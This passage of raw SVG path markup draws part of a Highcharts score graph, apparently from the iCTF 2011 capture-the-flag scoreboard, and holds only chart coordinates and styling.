fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 173.5 203.5 L 177.5 207.5 173.5 211.5 169.5 207.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 172 205 L 176 209 172 213 168 209 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 170.5 206 L 174.5 210 170.5 214 166.5 210 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 169 208.5 L 173 212.5 169 216.5 165 212.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 167.5 210 L 171.5 214 167.5 218 163.5 214 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 166 212.5 L 170 216.5 166 220.5 162 216.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 164.5 214.5 L 168.5 218.5 164.5 222.5 160.5 218.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 163 216 L 167 220 163 224 159 220 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 161.5 217 L 165.5 221 161.5 225 157.5 221 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 160 218 L 164 222 160 226 156 222 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 158 219.5 L 162 223.5 158 227.5 154 223.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 156.5 221 L 160.5 225 156.5 229 152.5 225 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 155 223.5 L 159 227.5 155 231.5 151 227.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 153.5 225.5 L 157.5 229.5 153.5 233.5 149.5 229.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 152 227 L 156 231 152 235 148 231 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 150.5 228 L 154.5 232 150.5 236 146.5 232 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 149 228.5 L 153 232.5 149 236.5 145 232.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 147.5 230 L 151.5 234 147.5 238 143.5 234 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 146 230.5 L 150 234.5 146 238.5 142 234.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 144.5 231.5 L 148.5 235.5 144.5 239.5 140.5 235.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 143 232 L 147 236 143 240 139 236 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 141.5 232 L 145.5 236 141.5 240 137.5 236 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 140 232 L 144 236 140 240 136 236 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 138.5 232 L 142.5 236 138.5 240 134.5 236 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 137 232 L 141 236 137 240 133 236 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 135.5 232.5 L 139.5 236.5 135.5 240.5 131.5 236.5 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 134 233 L 138 237 134 241 130 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 132.5 233 L 136.5 237 132.5 241 128.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 130.5 233 L 134.5 237 130.5 241 126.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 129 233 L 133 237 129 241 125 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 127.5 233 L 131.5 237 127.5 241 123.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 126 233 L 130 237 126 241 122 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 124.5 233 L 128.5 237 124.5 241 120.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 123 233 L 127 237 123 241 119 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 121.5 233 L 125.5 237 121.5 241 117.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 120 233 L 124 237 120 241 116 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 118.5 233 L 122.5 237 118.5 241 114.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 117 233 L 121 237 117 241 113 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 115.5 233 L 119.5 237 115.5 241 111.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 114 233 L 118 237 114 241 110 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 112.5 233 L 116.5 237 112.5 241 108.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 111 233 L 115 237 111 241 107 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 109.5 233 L 113.5 237 109.5 241 105.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 108 233 L 112 237 108 241 104 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 106.5 233 L 110.5 237 106.5 241 102.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 105 233 L 109 237 105 241 101 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 103 233 L 107 237 103 241 99 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 101.5 233 L 105.5 237 101.5 241 97.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 100 233 L 104 237 100 241 96 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 98.5 233 L 102.5 237 98.5 241 94.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 97 233 L 101 237 97 241 93 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 95.5 233 L 99.5 237 95.5 241 91.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 94 233 L 98 237 94 241 90 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 92.5 233 L 96.5 237 92.5 241 88.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 91 233 L 95 237 91 241 87 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 89.5 233 L 93.5 237 89.5 241 85.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 88 233 L 92 237 88 241 84 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 86.5 233 L 90.5 237 86.5 241 82.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 85 233 L 89 237 85 241 81 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 83.5 233 L 87.5 237 83.5 241 79.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 82 233 L 86 237 82 241 78 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 80.5 233 L 84.5 237 80.5 241 76.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 79 233 L 83 237 79 241 75 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 77.5 233 L 81.5 237 77.5 241 73.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 75.5 233 L 79.5 237 75.5 241 71.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 74 233 L 78 237 74 241 70 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 72.5 233 L 76.5 237 72.5 241 68.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 71 233 L 75 237 71 241 67 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 69.5 233 L 73.5 237 69.5 241 65.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 68 233 L 72 237 68 241 64 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 66.5 233 L 70.5 237 66.5 241 62.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 65 233 L 69 237 65 241 61 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 63.5 233 L 67.5 237 63.5 241 59.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 62 233 L 66 237 62 241 58 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 60.5 233 L 64.5 237 60.5 241 56.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 59 233 L 63 237 59 241 55 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 57.5 233 L 61.5 237 57.5 241 53.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 56 233 L 60 237 56 241 52 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 54.5 233 L 58.5 237 54.5 241 50.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 53 233 L 57 237 53 241 49 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 51.5 233 L 55.5 237 51.5 241 47.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 50 233 L 54 237 50 241 46 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 48 233 L 52 237 48 241 44 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 46.5 233 L 50.5 237 46.5 241 42.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 45 233 L 49 237 45 241 41 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 43.5 233 L 47.5 237 43.5 241 39.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 42 233 L 46 237 42 241 38 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 40.5 233 L 44.5 237 40.5 241 36.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 39 233 L 43 237 39 241 35 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 37.5 233 L 41.5 237 37.5 241 33.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 36 233 L 40 237 36 241 32 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 34.5 233 L 38.5 237 34.5 241 30.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 33 233 L 37 237 33 241 29 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 31.5 233 L 35.5 237 31.5 241 27.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 30 233 L 34 237 30 241 26 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 28.5 233 L 32.5 237 28.5 241 24.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 27 233 L 31 237 27 241 23 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 25.5 233 L 29.5 237 25.5 241 21.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 24 233 L 28 237 24 241 20 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 22 233 L 26 237 22 241 18 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 20.5 233 L 24.5 237 20.5 241 16.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 19 233 L 23 237 19 241 15 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 17.5 233 L 21.5 237 17.5 241 13.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 16 233 L 20 237 16 241 12 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 14.5 233 L 18.5 237 14.5 241 10.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 13 233 L 17 237 13 241 9 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 11.5 233 L 15.5 237 11.5 241 7.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 10 233 L 14 237 10 241 6 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 8.5 233 L 12.5 237 8.5 241 4.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 7 233 L 11 237 7 241 3 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 5.5 233 L 9.5 237 5.5 241 1.5 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path><path d="M 4 233 L 8 237 4 241 0 237 Z" fill="#7798BF" stroke="#333" stroke-width="0.000001"></path></g><g class="highcharts-series" clip-path="url(http://scoreboard.ictf2011.info/score-graph.html#highcharts-1580)" visibility="visible" transform="translate(75,55)"><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.78819946666667 L 146.01884191176472 236.76743052799998 L 147.546875 236.76743052799998 L 149.0749080882353 236.76743052799998 L 150.6029411764706 236.76743052799998 L 152.13097426470588 236.76743052799998 L 153.6590073529412 236.76743052799998 L 155.18704044117646 236.640553088 L 156.71507352941177 236.640553088 L 158.24310661764707 236.640553088 L 159.77113970588235 236.640553088 L 161.29917279411765 236.640553088 L 162.82720588235296 236.640553088 L 164.35523897058823 236.640553088 L 165.88327205882354 236.640553088 L 167.41130514705884 236.640553088 L 168.93933823529412 236.640553088 L 170.46737132352942 236.640553088 L 171.99540441176472 236.640553088 L 173.5234375 236.640553088 L 175.0514705882353 236.640553088 L 176.5795036764706 236.640553088 L 178.10753676470588 236.640553088 L 179.6355698529412 236.640553088 L 181.1636029411765 236.640553088 L 182.69163602941177 236.640553088 L 184.21966911764707 236.640553088 L 185.74770220588235 236.640553088 L 187.27573529411765 236.640553088 L 188.80376838235296 236.640553088 L 190.33180147058823 236.640553088 L 191.85983455882354 236.640553088 L 193.38786764705884 236.640553088 L 194.91590073529412 236.640553088 L 196.44393382352942 236.640553088 L 197.97196691176472 236.640553088 L 199.5 236.640553088 L 201.0280330882353 236.640553088 L 202.5560661764706 236.640553088 L 204.08409926470588 236.640553088 L 205.6121323529412 236.640553088 L 207.1401654411765 236.640553088 L 208.66819852941177 236.640553088 L 210.19623161764707 236.640553088 L 211.72426470588235 236.640553088 L 213.25229779411765 236.640553088 L 214.78033088235296 236.640553088 L 216.30836397058823 236.640553088 L 217.83639705882354 236.640553088 L 219.36443014705884 236.640553088 L 220.89246323529412 236.640553088 L 222.42049632352942 236.640553088 L 223.94852941176472 236.640553088 L 225.4765625 236.640553088 L 227.0045955882353 236.640553088 L 228.5326286764706 236.640553088 L 230.06066176470588 236.640553088 L 231.5886948529412 236.640553088 L 233.1167279411765 236.640553088 L 234.64476102941177 236.262752896 L 236.17279411764707 235.59710493866626 L 237.70082720588238 235.59710493866626 L 239.22886029411765 235.59710493866626 L 240.75689338235296 235.59710493866626 L 242.28492647058823 235.59710493866626 L 243.81295955882354 235.59710493866626 L 245.34099264705884 235.59710493866626 L 246.86902573529412 235.03695453866627 L 248.39705882352942 235.03695453866627 L 249.92509191176472 235.03695453866627 L 251.453125 235.03695453866627 L 252.9811580882353 235.03695453866627 L 254.5091911764706 234.79627101866626 L 256.0372242647059 234.79627101866626 L 257.56525735294116 234.79627101866626 L 259.09329044117646 234.79627101866626 L 260.62132352941177 234.22608977066625 L 262.1493566176471 234.22608977066625 L 263.6773897058824 233.38053261866628 L 265.2054227941177 232.14064781866625 L 266.7334558823529 231.52650701866628 L 268.26148897058823 230.10567149866625 L 269.78952205882354 228.30374189866626 L 271.31755514705884 225.22707053866628 L 272.84558823529414 225.22707053866628 L 274.37362132352945 225.22707053866628 L 275.9016544117647 225.22707053866628 L 277.4296875 224.81399661866624 L 278.9577205882353 223.65069293866625 L 280.4857536764706 223.65069293866625 L 282.0137867647059 223.65069293866625 L 283.54181985294116 223.65069293866625 L 285.06985294117646 223.65069293866625 L 286.59788602941177 223.65069293866625 L 288.1259191176471 223.65069293866625 L 289.6539522058824 223.65069293866625 L 291.1819852941177 223.65069293866625 L 292.7100183823529 223.65069293866625 L 294.23805147058823 223.65069293866625 L 295.76608455882354 223.65069293866625 L 297.29411764705884 223.65069293866625 L 298.82215073529414 223.65069293866625 L 300.35018382352945 223.65069293866625 L 301.8782169117647 223.65069293866625 L 303.40625 223.65069293866625 L 304.9342830882353 223.01968013866627 L 306.4623161764706 221.93660429866625 L 307.9903492647059 221.93660429866625 L 309.51838235294116 217.78161441066626 L 311.04641544117646 214.86760412799998 L 312.57444852941177 213.88576818133254 L 314.1024816176471 213.88576818133254 L 315.6305147058824 213.88576818133254 L 317.1585477941177 210.6846031679988 L 318.6865808823529 204.55961330133607 L 320.21461397058823 200.26737650133606 L 321.74264705882354 180.01167026133606 L 323.27068014705884 172.83207304533607 L 324.79871323529414 168.88199330133608 L 326.32674632352945 164.46152930133607 L 327.8547794117647 158.0355386133361 L 329.3828125 150.96954501333607 L 330.9108455882353 141.71086629333607 L 332.4388786764706 134.81065321600232 L 333.9669117647059 127.58171674666863 L 335.4949448529412 127.58171674666863 L 337.02297794117646 127.58171674666863 L 338.55101102941177 125.33127216000116 L 340.0790441176471 125.33127216000116 L 341.6070772058824 125.33127216000116 L 343.1351102941177 125.33127216000116 L 344.6631433823529 125.33127216000116 L 346.19117647058823 125.33127216000116 L 347.71920955882354 125.33127216000116 L 349.24724264705884 125.33127216000116 L 350.77527573529414 125.33127216000116 L 352.30330882352945 125.33127216000116 L 353.8313419117647 125.33127216000116 L 355.359375 125.33127216000116 L 356.8874080882353 125.33127216000116 L 358.4154411764706 125.33127216000116 L 359.9434742647059 125.33127216000116 L 361.4715073529412 125.33127216000116 L 362.99954044117646 120.54637296000115 L 364.52757352941177 115.63594608000113 L 366.0556066176471 115.63594608000113 L 367.5836397058824 115.63594608000113 L 369.1116727941177 115.63594608000113 L 370.6397058823529 115.63594608000113 L 372.16773897058823 115.63594608000113 L 373.69577205882354 115.63594608000113 L 375.22380514705884 112.81359792000114 L 376.75183823529414 110.49875952000116 L 378.27987132352945 110.49875952000116 L 379.8079044117647 110.20181232000115 L 381.3359375 109.91161392000114 L 382.8639705882353 109.91161392000114 L 384.3920036764706 109.91161392000114 L 385.9200367647059 109.13077776000114 L 387.4480698529412 109.13077776000114 L 388.97610294117646 109.13077776000114 L 390.50413602941177 108.82484400000112 L 392.0321691176471 108.79657323733451 L 393.5602022058824 108.79657323733451 L 395.0882352941177 105.94183083733449" fill="none" stroke="rgb(0, 0, 0)" stroke-width="5" isShadow="true" stroke-opacity="0.05" transform="translate(1,1)"></path><path d="M 3.9117647058823533 236.8 L 5.439797794117648 236.8 L 6.967830882352942 236.8 L 8.495863970588236 236.8 L 10.02389705882353 236.8 L 11.551930147058824 236.8 L 13.07996323529412 236.8 L 14.607996323529413 236.8 L 16.136029411764707 236.8 L 17.6640625 236.8 L 19.192095588235297 236.8 L 20.72012867647059 236.8 L 22.248161764705884 236.8 L 23.776194852941178 236.8 L 25.30422794117647 236.8 L 26.832261029411764 236.8 L 28.360294117647058 236.8 L 29.88832720588235 236.8 L 31.416360294117645 236.8 L 32.94439338235294 236.8 L 34.47242647058823 236.8 L 36.00045955882353 236.8 L 37.528492647058826 236.8 L 39.056525735294116 236.8 L 40.58455882352941 236.8 L 42.1125919117647 236.8 L 43.640625 236.8 L 45.16865808823529 236.8 L 46.69669117647059 236.8 L 48.224724264705884 236.8 L 49.75275735294118 236.8 L 51.28079044117648 236.8 L 52.80882352941177 236.8 L 54.336856617647065 236.8 L 55.864889705882355 236.8 L 57.39292279411765 236.8 L 58.92095588235295 236.8 L 60.44898897058824 236.8 L 61.977022058823536 236.8 L 63.505055147058826 236.8 L 65.03308823529412 236.8 L 66.56112132352942 236.8 L 68.08915441176471 236.8 L 69.6171875 236.8 L 71.1452205882353 236.8 L 72.6732536764706 236.8 L 74.20128676470588 236.8 L 75.72931985294119 236.8 L 77.25735294117648 236.8 L 78.78538602941177 236.8 L 80.31341911764706 236.8 L 81.84145220588236 236.8 L 83.36948529411765 236.8 L 84.89751838235294 236.8 L 86.42555147058825 236.8 L 87.95358455882354 236.8 L 89.48161764705883 236.8 L 91.00965073529413 236.8 L 92.53768382352942 236.8 L 94.06571691176471 236.8 L 95.59375 236.8 L 97.1217830882353 236.8 L 98.6498161764706 236.8 L 100.17784926470588 236.8 L 101.70588235294119 236.8 L 103.23391544117648 236.8 L 104.76194852941177 236.8 L 106.28998161764706 236.8 L 107.81801470588236 236.8 L 109.34604779411765 236.8 L 110.87408088235294 236.8 L 112.40211397058825 236.8 L 113.93014705882354 236.8 L 115.45818014705883 236.8 L 116.98621323529413 236.8 L 118.51424632352942 236.8 L 120.04227941176471 236.8 L 121.5703125 236.8 L 123.0983455882353 236.8 L 124.6263786764706 236.8 L 126.15441176470588 236.8 L 127.68244485294119 236.8 L 129.21047794117646 236.8 L 130.73851102941177 236.8 L 132.26654411764707 236.8 L 133.79457720588235 236.8 L 135.32261029411765 236.8 L 136.85064338235296 236.8 L 138.37867647058823 236.8 L 139.90670955882354 236.8 L 141.43474264705884 236.8 L 142.96277573529412 236.8 L 144.49080882352942 236.78819946666667 L 146.01884191176472 236.76743052799998 L 147.546875 236.76743052799998 L 149.0749080882353 236.76743052799998 L 150.6029411764706 236.76743052799998 L 152.13097426470588 236.76743052799998 L 153.6590073529412 236.76743052799998 L 155.18704044117646 236.640553088 L 156.71507352941177 236.640553088 L 158.24310661764707 236.640553088 L 159.77113970588235 236.640553088 L 161.29917279411765 236.640553088 L 162.82720588235296 236.640553088 L 164.35523897058823 236.640553088 L 165.88327205882354 236.640553088 L 167.41130514705884 236.640553088 L 168.93933823529412 236.640553088 L 170.46737132352942 236.640553088 L 171.99540441176472 236.640553088 L 173.5234375 236.640553088 L 175.0514705882353 236.640553088 L 176.5795036764706 236.640553088 L 178.10753676470588 236.640553088 L 179.6355698529412 236.640553088 L 181.1636029411765 236.640553088 L 182.69163602941177 236.640553088 L 184.21966911764707 236.640553088 L 185.74770220588235 236.640553088 L 187.27573529411765 236.640553088 L 188.80376838235296 236.640553088 L 190.33180147058823 236.640553088 L 191.85983455882354 236.640553088 L 193.38786764705884 236.640553088 L 194.91590073529412 236.640553088 L 196.44393382352942 236.640553088 L 197.97196691176472 236.640553088 L 199.5 236.640553088 L 201.0280330882353 236.640553088 L 202.5560661764706 236.640553088 L 204.08409926470588 236.640553088 L 205.6121323529412 236.640553088 L 207.1401654411765 236.640553088 L 208.66819852941177 236.640553088 L 210.19623161764707 236.640553088 L 211.72426470588235 236.640553088 L 213.25229779411765 236.640553088 L 214.78033088235296 236.640553088 L 216.30836397058823 236.640553088 L 217.83639705882354 236.640553088 L 219.36443014705884 236.640553088 L 220.89246323529412 236.640553088 L 222.42049632352942 236.640553088 L 223.94852941176472 236.640553088 L 225.4765625 236.640553088 L 227.0045955882353 236.640553088 L 228.5326286764706 236.640553088 L 230.06066176470588 236.640553088 L 231.5886948529412 236.640553088 L 233.1167279411765 236.640553088 L 234.64476102941177 236.262752896 L 236.17279411764707 235.59710493866626 L 237.70082720588238 235.59710493866626 L 239.22886029411765 235.59710493866626 L 240.75689338235296 235.59710493866626 L 242.28492647058823 235.59710493866626 L 243.81295955882354 235.59710493866626 L 245.34099264705884 235.59710493866626 L 246.86902573529412 235.03695453866627 L 248.39705882352942 235.03695453866627 L 249.92509191176472 235.03695453866627 L 251.453125 235.03695453866627 L 252.9811580882353 235.03695453866627 L 254.5091911764706 234.79627101866626 L 256.0372242647059 234.79627101866626 L 257.56525735294116 234.79627101866626 L 259.09329044117646 234.79627101866626 L 260.62132352941177 234.22608977066625 L 262.1493566176471 234.22608977066625 L 263.6773897058824 233.38053261866628 L 265.2054227941177 232.14064781866625 L 266.7334558823529 231.52650701866628 L 268.26148897058823 230.10567149866625 L 269.78952205882354 228.30374189866626 L 271.31755514705884 225.22707053866628 L 272.84558823529414 225.22707053866628 L 274.37362132352945 225.22707053866628 L 275.9016544117647 225.22707053866628 L 277.4296875 224.81399661866624 L 278.9577205882353 223.65069293866625 L 280.4857536764706 223.65069293866625 L 282.0137867647059 223.65069293866625 L 283.54181985294116 223.65069293866625 L 285.06985294117646 223.65069293866625 L 286.59788602941177 223.65069293866625 L 288.1259191176471 223.65069293866625 L 289.6539522058824 223.65069293866625 L 291.1819852941177 223.65069293866625 L 292.7100183823529 223.65069293866625 L 294.23805147058823 223.65069293866625 L 295.76608455882354 223.65069293866625 L 297.29411764705884 223.65069293866625 L 298.82215073529414 223.65069293866625 L 300.35018382352945 223.65069293866625 L 301.8782169117647 223.65069293866625 L 303.40625 223.65069293866625 L 304.9342830882353 223.01968013866627 L 306.4623161764706 221.93660429866625 L 307.9903492647059 221.93660429866625 L 309.51838235294116 217.78161441066626 L 311.04641544117646 214.86760412799998 L 312.57444852941177 213.88576818133254 L 314.1024816176471 213.88576818133254 L 315.6305147058824 213.88576818133254 L 317.1585477941177 210.6846031679988 L 318.6865808823529 204.55961330133607 L 320.21461397058823 200.26737650133606 L 321.74264705882354 180.01167026133606 L 323.27068014705884 172.83207304533607 L 324.79871323529414 168.88199330133608 L 326.32674632352945 164.46152930133607 L 327.8547794117647 158.0355386133361 L 329.3828125 150.96954501333607 L 330.9108455882353 141.71086629333607 L 332.4388786764706 134.81065321600232 L 333.9669117647059 127.58171674666863 L 335.4949448529412 127.58171674666863 L 337.02297794117646 127.58171674666863 L 338.55101102941177 125.33127216000116 L 340.0790441176471 125.33127216000116 L 341.6070772058824 125.33127216000116 L 343.1351102941177 125.33127216000116 L 344.6631433823529 125.33127216000116 L 346.19117647058823 125.33127216000116 L 347.71920955882354 125.33127216000116 L 349.24724264705884 125.33127216000116 L 350.77527573529414 125.33127216000116 L 352.30330882352945 125.33127216000116 L 353.8313419117647 125.33127216000116 L 355.359375 125.33127216000116 L 356.8874080882353 125.33127216000116 L 358.4154411764706 125.33127216000116 L 359.9434742647059 125.33127216000116 L 361.4715073529412 125.33127216000116 L 362.99954044117646 120.54637296000115 L 364.52757352941177 115.63594608000113 L 366.0556066176471 115.63594608000113 L 367.5836397058824 115.63594608000113 L 369.1116727941177 115.63594608000113 L 370.6397058823529 115.63594608000113 L 372.16773897058823 115.63594608000113 L 373.69577205882354 115.63594608000113 L 375.22380514705884 112.81359792000114 L 376.75183823529414 110.49875952000116 L 378.27987132352945 